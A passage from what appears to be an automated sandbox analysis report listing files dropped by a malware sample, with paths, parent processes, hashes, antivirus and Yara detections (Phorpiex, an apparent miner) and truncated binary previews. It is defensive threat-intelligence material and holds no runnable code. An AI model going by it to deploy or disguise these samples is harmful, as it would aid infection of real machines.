..x..cx..k.it....9.f#:a.#.C"...Q..l.0p.....{..{......r.tE:..r:.'l.L]!..p.oX...A..d.Oq.........'Fa.\|.yM..{x;...!.++..H......}..b...p..p.8.h.;...q.L..L.a.<.x.<....j....\.:...iQ..zec.^.......<.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dwntbl[1]

Download File

Process:	C:\Windows\sysppvrdnvs.exe
File Type:	data
Category:	dropped
Size (bytes):	85760
Entropy (8bit):	7.998087239673687
Encrypted:	true
SSDEEP:	1536:17wFGypBQDLreXJ4xaX8px3nB7C6RfEysfoVE9iGeL8LNoaZb3raWBL:RwrTQTeXJh8z3nBTqjoGeQCaJu0
MD5:	20493FD87FE8305516142680D848F1CE
SHA1:	8DF2CB6236677885685BA97E328F37CD8F5492D3
SHA-256:	FC4A761817120D2DE8B7618833F0EB92410977CF06F4D2A4FB4AF567C40C5DB3
SHA-512:	BBBB809C3869B9D28D8CF490B3390B6FD1E6D25DB69BE7FC6EA5ACFA7FF79FB995F43BD113A74BA3FFBFEB32FA3EC0FB971988094EE436DAC283616E3142EC48
Malicious:	false
Preview:	s..W]...._..\|O..Y.W.......q.j..".n....+.H\|\...E..[.E...'..Y\|.{e..:.Y..]..u....X..j....R..e.7.~.p)....x~.j..t".u.>N....j.>..k@"....eQ.....oN...;$4....x.nv.....2`A.S.....t.R..)O...........%.S....1.c.Y.....X........u.N....T..`.X.WV...T..p.f.....+%.{%]P...z.;......z..%.".....V.zgZ..j......I;.bz.....MMb..b5h...m.o.%..!.M..t0x..pg&....v.2..H.oc:..?.W.{6.F........V.....#..m._M...o2..4)O.W#...E..>.....?W......iU.V.#p.{.%.I.}hb.......$..l...m....1s^z'...4..........{..s..px...WP..?.Q.E)......!.......U.........:07.(t....6.0p.wa..h...._4.\N...}...c\|]{c.V'.....y.....f.d.C.....I.....:.U.+...Q.."...f...y...O..9....../..f}m.L{Z.O..$E..)..6$......d..tc....?.1....>H...'4U^......<.W..%.....,1%..((........1..8.0...aq.v.....!.k.x..X.-\|...M.1.Z.^\.o..qy.q.]....{~.}......D.7K..{..2.a..uO.W....a......[."..E.?...!....DS*.y.S..exPJ.. K.@.~.nZ.H../M..Y......."......t.ZO..\|nN.....u..X..\^...s.-[a.[..3K....s.-.@5z...H.\|.....{.I ..uU......[...HN.}..A..Zsy0..=i9

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\pei[1].exe

Download File

Process:	C:\Users\user\Desktop\T52Z708x2p.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.254547230411213
Encrypted:	false
SSDEEP:	96:zMn7AN23D0TXraYgnY1dTNDiIp+BYA8vrcVO15uJxGE9YUBz2qh3C7tCEkC:A7ANUYhUYPtp+OFMJxTmUBzthckC
MD5:	8D8E6C7952A9DC7C0C73911C4DBC5518
SHA1:	9098DA03B33B2C822065B49D5220359C275D5E94
SHA-256:	FEB4C3AE4566F0ACBB9E0F55417B61FEFD89DC50A4E684DF780813FB01D61278
SHA-512:	91A573843C28DD32A9F31A60BA977F9A3D4BB19FFD1B7254333E09BCECEF348C1B3220A348EBB2CB08EDB57D56CB7737F026519DA52199C9DC62C10AEA236645
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Joe Sandbox View:	Filename: thcdVit1dX.exe, Detection: malicious, Browse Filename: dgiX55cHyU.exe, Detection: malicious, Browse Filename: bomb.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gd.##.`p#.`p#.`p}.p!.`p}.p".`p}.p6.`p...p(.`p#.ap..`p}.p .`p*}.p".`pRich#.`p................PE..L.....Df..................................... ....@..........................`......?.....@.................................l$.......@.......................P.......................................#..@............ ...............................text...z........................... ..`.rdata..4.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nxmr[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1332331323.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	modified
Size (bytes):	5827584
Entropy (8bit):	7.718261688436852
Encrypted:	false
SSDEEP:	98304:ZMknXV8IFUX81qQ6lLYhJ/N0TB4HBDxWcLKamiwPZhsSZLZ1wpxGN:ZBnXV86UiqrlLY/8AW6YZPZf6HGN
MD5:	13B26B2C7048A92D6A843C1302618FAD
SHA1:	89C2DFC01AC12EF2704C7669844EC69F1700C1CA
SHA-256:	1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
SHA-512:	D6AFF89B61C9945002A6798617AD304612460A607EF1CFBDCB32F8932CA648BCEE1D5F2E0321BB4C58C1F4642B1E0ECECC1EB82450FDEC7DFF69B5389F195455
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Joe Sandbox View:	Filename: Us051y7j25.exe, Detection: malicious, Browse Filename: bBcZoComLl.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: dgiX55cHyU.exe, Detection: malicious, Browse Filename: GGXhCiYFBw.exe, Detection: malicious, Browse Filename: 0NSjUT34gS.exe, Detection: malicious, Browse Filename: 1mqzOM6eok.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.X............`Y.0.............................X.(...................."Y.P............................text...P...........................`..`.data.....V.......V.................@....rdata...9....X..:...xX.............@..@.pdata..X.....X.......X.............@..@.xdata........X.......X.............@..@.bss..........Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\1[1]

Download File

Process:	C:\Users\user\sysppvrdnvs.exe
File Type:	data
Category:	dropped
Size (bytes):	110600
Entropy (8bit):	7.998486619051527
Encrypted:	true
SSDEEP:	3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
MD5:	1FCB78FB6CF9720E9D9494C42142D885
SHA1:	FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
SHA-256:	84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
SHA-512:	CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
Malicious:	false
Preview:	NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...\|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../\|."...b.W........Ro.......j.(\|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\2[1]

Download File

Process:	C:\Windows\sysppvrdnvs.exe
File Type:	data
Category:	dropped
Size (bytes):	8960
Entropy (8bit):	7.980118959451248
Encrypted:	false
SSDEEP:	192:8w3f/H9pFkeMpRmPIlHDCEkAH5gWPmEt3TXxl/6LkbgewuNvm:8snHrUVjbHH5g+mEt3z64bdNvm
MD5:	39F45EDB23427EBF63197CA138DDB282
SHA1:	4BE1B15912C08F73687C0E4C74AF0979C17FF7D5
SHA-256:	77FBB0D8630024634880C37DA59CE57D1B38C7E85BDCC14C697DB9E79C24E0DE
SHA-512:	410F6BAAD25B256DAEBFA5D8B8A495429C9E26E7DE767B2A0E6E4A75E543B77DBD0ABCA0335FB1F0D91E49E292B42CEDC6EDD72D25A3C4C62330E2B31C054CC6
Malicious:	false
Preview:	$.g.r5].F.M[..o.I.........5.Eb....L6,.i%.kZ.....8....ePI\|.....<..iq....#.......O@5..U\|{`)...].H........x..-..dR~A.}"2......... +.(..R.m....d...!..(...$..5.t...F.]...<.g"...V.(1}.]C........s3..76..&...Ic...%t..h.I.b.....R(......}..IE...<.....]..C.....9....xi\|........../.....>y..4m..3..hO.....;...<.\|..5.,.0.tA`.J..Nn;.w.es...q.T.._...:<....fb7..J.H.3&. ...f..1.F.G.c..&k..,J..x+..c.`.w....s....~.........(s..F..IT...,....5\.).}..-..@........4.>a.u...e.\..v.=.I.kB..[..Q...2..c.LA.lT..rO.....U.Y..m.j#.u...U..P...>.Y{,...Tk....3.h.,v..)..P.TK3_.+..+....m..NP[..qe.......G9.f..\|........[.-&M~&..14w.._.l.a./.ok...w.M.._...w..^7Rgg....%.Tv...}....T..p...;d.Su..z.FPH...Z....I...pz5...0g..`..l..K\V3...t..r.y.l...2..R.]?cz.m....v....o.......\. ....0.o.N3.a.P..V.=BE\..... _.^hV.f.\..n.$0..q.C........7..BQ.n...}c..../.Yd=.G...-.....T.Sx..&...z.wi...:...,.a..........o.ou....Hn...8....Zx...............F^=R...nU.T.D9.'.W..L.dPi.^`ZBj..2.....z.\.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\4[1]

Download File

Process:	C:\Windows\sysppvrdnvs.exe
File Type:	data
Category:	dropped
Size (bytes):	10496
Entropy (8bit):	7.984469394998947
Encrypted:	false
SSDEEP:	192:aAnkxbr7XNTQwFtSiiFh1eBtpQ9dys4Hcbnvsi3i9FS0swDNC6:aAkxbre0gBFh1xdyCjzWd
MD5:	2266F0AECD351E1B4092E82B941211EA
SHA1:	1DCED8D943494AA2BE39CA28C876F8F736C76EF1
SHA-256:	CBBAD0AB02CD973C9C4E73336E3BCD0849AEB2232A7BDBC38F0B50696B5C28C3
SHA-512:	6691CD697BBE7F7A03D9DE33869AAB289D0A1438B4EE194D2047DED957A726B1D3FE93F08E4A0C677018B20E2521AEB021AB1DC4D1A67927604829DDFD9D59AA
Malicious:	false
Preview:	..\|.@vC)...q.9....K.{>...d8..'.s.....J.......Pn..k.V.z...@W....L{..uG.'G1.CL..@...<B..6..;.>hM..\..\|w.B.v.....u.g...OX.%. .h.r9:\|....s..<.6.).g..4GlY...2Bf.5...A..+G....(.T-oE..Z.I23.{..'3...)`...^e7jz/M$s......4....*16..m..frn..DD,......Wa(.2.D..9...........x..........Zk4Da...)?.._h...sA..W.....B2.....cHQ.T....=..U...@.3.}....!...Y.G.C...X{... 4"...&..h.0..'xu..#.c.\|g...L0....)...c..M...]....oL{...:En:?.\|_X.P.........Q@. .3...o.....).u..a..[...I...+....f....Z.M..%. ].2.uz._......Gw....t.0b........Fa....MT.d..2.Y....&....T............M..X...P......}..+.....Op..Q.E.o6R;.P..>8`2.'".....~C..Z_.........,.2g.. $..l....."x...:.h;..H...........`.$-6....._-e...C?.6T..=..q...L...3.&fG)..W..G..@6.X~.%X....%R...C.h..?R...]......f...bU!.PH..h...".......R...j,d.k......e..\....~.h..n(.....,.G...<...u.1....6t......l.....w;..p..;y..rSC....._.M....6.X....h..t.G7zs..HP,e_d.d.c.n..^.M+ct\0j.r.>;......_n.q.>.x.e.z...w...o...%kkw..Fg..A/.cS..Q./=cj.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\newtpp[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\70AF.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	85504
Entropy (8bit):	6.394560338648692
Encrypted:	false
SSDEEP:	1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
MD5:	06560B5E92D704395BC6DAE58BC7E794
SHA1:	FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
SHA-256:	9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
SHA-512:	B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\newtpp[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................\|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\1121631426.exe

Download File

Process:	C:\Windows\sysppvrdnvs.exe
File Type:	data
Category:	dropped
Size (bytes):	110600
Entropy (8bit):	7.998486619051527
Encrypted:	true
SSDEEP:	3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
MD5:	1FCB78FB6CF9720E9D9494C42142D885
SHA1:	FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
SHA-256:	84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
SHA-512:	CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
Malicious:	false
Preview:	NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...\|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../\|."...b.W........Ro.......j.(\|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O

C:\Users\user\AppData\Local\Temp\1332331323.exe

Download File

Process:	C:\Windows\sysppvrdnvs.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	5.134070469138298
Encrypted:	false
SSDEEP:	96:vdHiIV5H6c10lqo9ZYAoQdVDCcJ+587tG6AuJxGE9btz2qhRC7tCEOhd1Q:vdHiQ5HV1wr9KA/J+izJxTZtzthyOhd
MD5:	96509AB828867D81C1693B614B22F41D
SHA1:	C5F82005DBDA43CEDD86708CC5FC3635A781A67E
SHA-256:	A9DE2927B0EC45CF900508FEC18531C04EE9FA8A5DFE2FC82C67D9458CF4B744
SHA-512:	FF603117A06DA8FB2386C1D2049A5896774E41F34D05951ECD4E7B5FC9DA51A373E3FCF61AF3577FF78490CF898471CE8E71EAE848A12812FE98CD7E76E1A9CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.Y/.../.../...&.`.-...&.f.....&.p.:....k..".../.......&.w.,...&.b.....Rich/...................PE..L...'V.f..................................... ....@..........................`.......e....@.................................<$.......@.......................P......................................x#..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1378231302.exe

Download File

Process:	C:\Users\user\sysppvrdnvs.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	13312
Entropy (8bit):	5.259790062623363
Encrypted:	false
SSDEEP:	192:0iBbxFJyyHpXQE+FJx34ymFpQ9999999999999999999999999999999999999KI:XxF0yHR+Foy
MD5:	5A0D146F7A911E98DA8CC3C6DE8ACABF
SHA1:	4EC56B14A08C897A5E9E85F5545B6C976A0BE3C1
SHA-256:	BF61E77B7C49CE3346A28D8BC084C210618EA6EC5F3CFA9AE8F4AA4D64E145F1
SHA-512:	6D1526A5F467535D51B7F9B3A7AF2D54512526E2523E3048082277B83B6E1A1F0D7E3C617405898F240AE84A16163BC47886D8541A016B31C51DFADF9DA713E1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,CE.B.E.B.E.B.b.9.M.B.L...F.B.E.C.u.B.L...D.B.L...P.B.L...F.B.L...D.B.RichE.B.................PE..L......g.....................&......_........ ....@..........................p............@.................................<#..x....P.......................`..`...................................p"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...4....0......................@....rsrc........P......................@..@.reloc.......`.......2..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\158238779.exe

Download File

Process:	C:\Windows\sysppvrdnvs.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	8704
Entropy (8bit):	5.0125514402992275
Encrypted:	false
SSDEEP:	192:Otk3w0++KjlRC5vVkDlBj9k2cugyJBLCsZ:OEYjlRAGlBj9kSgiLC0
MD5:	CB8420E681F68DB1BAD5ED24E7B22114
SHA1:	416FC65D538D3622F5CA71C667A11DF88A927C31
SHA-256:	5850892F67F85991B31FC90F62C8B7791AFEB3C08AE1877D857AA2B59471A2EA
SHA-512:	BAAABCC4AD5D409267A34ED7B20E4AFB4D247974BFC581D39AAE945E5BF8A673A1F8EACAE2E6783480C8BAAEB0A80D028274A202D456F13D0AF956AFA0110FDF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....=d.........."...................... .....@..... .......................`............@...@......@............... ...............................@..(............................................................................................ ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`......."..............@..BH........#.......................................................................0..i.......r...pr...p(......&..r...pr...p(......&..(......&.. ....(....~.....(.....((....r:..p(....(......&...(........4...................%........(../........<.#_.......0..:.......s.......o......o.....(....o......o......o.....(....&..&............66.......0..\..................rt..p....s.....(.........+6........o....o....r...p(....(...+.2...o....o.......X.......i2............r...p.........(....(.....

C:\Users\user\AppData\Local\Temp\1706633239.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\70AF.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	6.394560338648692
Encrypted:	false
SSDEEP:	1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
MD5:	06560B5E92D704395BC6DAE58BC7E794
SHA1:	FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
SHA-256:	9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
SHA-512:	B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\1706633239.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................\|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\193938922.exe

Download File

Process:	C:\Users\user\sysppvrdnvs.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	8704
Entropy (8bit):	5.0125514402992275
Encrypted:	false
SSDEEP:	192:Otk3w0++KjlRC5vVkDlBj9k2cugyJBLCsZ:OEYjlRAGlBj9kSgiLC0
MD5:	CB8420E681F68DB1BAD5ED24E7B22114
SHA1:	416FC65D538D3622F5CA71C667A11DF88A927C31
SHA-256:	5850892F67F85991B31FC90F62C8B7791AFEB3C08AE1877D857AA2B59471A2EA
SHA-512:	BAAABCC4AD5D409267A34ED7B20E4AFB4D247974BFC581D39AAE945E5BF8A673A1F8EACAE2E6783480C8BAAEB0A80D028274A202D456F13D0AF956AFA0110FDF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....=d.........."...................... .....@..... .......................`............@...@......@............... ...............................@..(............................................................................................ ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`......."..............@..BH........#.......................................................................0..i.......r...pr...p(......&..r...pr...p(......&..(......&.. ....(....~.....(.....((....r:..p(....(......&...(........4...................%........(../........<.#_.......0..:.......s.......o......o.....(....o......o......o.....(....&..&............66.......0..\..................rt..p....s.....(.........+6........o....o....r...p(....(...+.2...o....o.......X.......i2............r...p.........(....(.....

C:\Users\user\AppData\Local\Temp\2234110106.exe

Download File

Process:	C:\Users\user\sysppvrdnvs.exe
File Type:	data
Category:	dropped
Size (bytes):	110600
Entropy (8bit):	7.998486619051527
Encrypted:	true
SSDEEP:	3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
MD5:	1FCB78FB6CF9720E9D9494C42142D885
SHA1:	FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
SHA-256:	84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
SHA-512:	CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
Malicious:	false
Preview:	NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...\|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../\|."...b.W........Ro.......j.(\|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O

C:\Users\user\AppData\Local\Temp\2311326414.exe

Download File

Process:	C:\Windows\sysppvrdnvs.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.259790062623363
Encrypted:	false
SSDEEP:	192:0iBbxFJyyHpXQE+FJx34ymFpQ9999999999999999999999999999999999999KI:XxF0yHR+Foy
MD5:	5A0D146F7A911E98DA8CC3C6DE8ACABF
SHA1:	4EC56B14A08C897A5E9E85F5545B6C976A0BE3C1
SHA-256:	BF61E77B7C49CE3346A28D8BC084C210618EA6EC5F3CFA9AE8F4AA4D64E145F1
SHA-512:	6D1526A5F467535D51B7F9B3A7AF2D54512526E2523E3048082277B83B6E1A1F0D7E3C617405898F240AE84A16163BC47886D8541A016B31C51DFADF9DA713E1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,CE.B.E.B.E.B.b.9.M.B.L...F.B.E.C.u.B.L...D.B.L...P.B.L...F.B.L...D.B.RichE.B.................PE..L......g.....................&......_........ ....@..........................p............@.................................<#..x....P.......................`..`...................................p"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...4....0......................@....rsrc........P......................@..@.reloc.......`.......2..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\236013504.exe

Download File

Process:	C:\Users\user\sysppvrdnvs.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	5.151089744220859
Encrypted:	false
SSDEEP:	384:M2moXxWtTFRyGMdMdMdMdMdMdMdMdMP/F2:MJoi6g
MD5:	0C37EE292FEC32DBA0420E6C94224E28
SHA1:	012CBDDDADDAB319A4B3AE2968B42950E929C46B
SHA-256:	981D724FEEBC36777E99513DC061D1F009E589F965C920797285C46D863060D1
SHA-512:	2B60B571C55D0441BA0CFC695F9DB5CD12660EBEC7EFFC7E893C3B7A1C6CB6149DF487C31B8D748697E260CBC4AF29331592B705EA9638F64A711C7A6164628B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0..WQ..WQ..WQ..p...]Q..^)S.TQ..WQ..jQ..^)U.UQ..^)C.BQ..^)D.TQ..^)Q.VQ..RichWQ..........................PE..L......f..................................... ....@..........................p......xn....@..................................&..x....P.......................`..x....................................&..@............ ...............................text...d........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........P.......6..............@..@.reloc.. ....`.......:..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2448028260.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1332331323.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5827584
Entropy (8bit):	7.718261688436852
Encrypted:	false
